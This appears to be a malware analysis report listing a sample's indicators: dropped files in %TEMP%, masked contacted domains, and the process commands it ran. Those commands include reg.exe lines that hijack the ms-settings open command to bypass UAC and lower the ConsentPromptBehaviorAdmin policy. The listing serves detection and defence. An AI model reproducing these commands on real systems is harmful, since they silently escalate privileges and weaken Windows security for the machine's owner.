Technical Information
- [<HKCU>\SOFTWARE\Classes\ms-settings\shell\open\command] '' = '<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_...
- %TEMP%\gabb.exe
- %TEMP%\uac.bat
- %TEMP%\uac.bat
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://ic###azip.com/
- DNS ASK cd#.##scordapp.com
- DNS ASK microsoft.com
- DNS ASK ic###azip.com
- DNS ASK ge###tatool.com
- '%TEMP%\gabb.exe'
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\UAC.bat"
- '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdm...
- '<SYSTEM32>\reg.exe' ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\DC.exe" /D